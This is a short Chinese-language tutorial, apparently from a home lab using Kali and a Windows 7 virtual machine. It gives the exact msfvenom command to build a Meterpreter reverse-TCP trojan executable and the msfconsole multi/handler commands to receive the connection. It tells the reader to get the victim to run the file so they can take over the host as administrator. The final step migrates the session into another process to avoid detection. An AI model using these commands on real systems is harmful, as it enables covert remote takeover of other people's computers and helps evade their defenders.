工具:kali window7(已关防火墙) 虚拟机VMware Workstation
进入kali root模式
1、制作攻击脚本
msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx(kali的ip) lport=5027(端口) -f exe -o /home/kali/Desktop/文件名.exe
-p 设置payload
-f 设置木马的格式
-o 设置输出文件路径
2、将在桌面看到文件名.exe的文件,将此文件移到windows 7中
3、进入msfconsole,在攻击端开启服务,等待客户机连接
使用攻击模块,来生成相应的进程等待客户端连接
use exploit/multi/handler
设置所使用的payload(因为我们生成的木马程序是反向tcp的链接,所以这里也要采用同样是反向tcp链接的payload才能对应接收到待会的反向链接)
set payload windows/meterpreter/reverse_tcp
4、查看相应的参数
show options
5 设置相对应的参数
set lhost xxx.xxx.xxx.xxx(kaliip)
set lport 5027
6 发起连接
exploit
7 在Windows中双击打开木马程序即可链接成功
如连接不成功则改网段后再重复以上步骤重做一次
链接成功后即可以管理员身份接管主机
8 隐藏木马连接,为防止被发现,将运行的进程迁移到其他程序进程中
migrate 2104(不易被发现的进程号)